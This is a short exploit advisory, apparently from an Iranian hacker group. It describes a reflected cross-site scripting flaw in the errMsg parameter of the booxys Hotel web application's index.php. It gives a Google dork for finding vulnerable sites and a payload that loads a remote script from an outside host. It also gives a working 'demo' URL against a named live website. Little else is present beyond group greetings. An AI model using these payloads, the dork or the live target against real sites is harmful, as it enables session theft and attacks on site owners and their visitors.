#(+)Exploit Title: booxys Hotel [index.php] Cross site scripting Vulnerability #(+)Author : Net.Edit0r #(+)Software Link : http://www.booxys.com/ #(+) E-mail : Black.hat.tm@Gmail.com & Net.Edit0r@att.net #(+) dork : inurl:"index.php?errMsg=" #(+) Versian : [1.0] #(+) Category : Web Apps [XSS] #(+) Platform : Tested on: linux ____________________________________________________________________ ____________________________________________________________________ The security problem in the file "index.php" has been created. You can disable this security problem Plagn take it away. [~] Vulnerable File : # [+]http://localhost.com/de/index.php?errMsg=[XSS] [~] Cross-site scripting Vulnerability # [+]/de/index.php?errMsg=[XSS] # [+]http://localhost.com/de/index.php?errMsg=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> [~] Demo : http://www.hotel-board.com/de/index.php?errMsg=<script>alert(1);</script> ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)#BHG Member : & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly (+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ M4hd1 ~ Mikili ~ 4min (+)Gr33ts to : Black-Hg.Org ~ Pentesters.ir & All Iranian HackerZ ########################################################################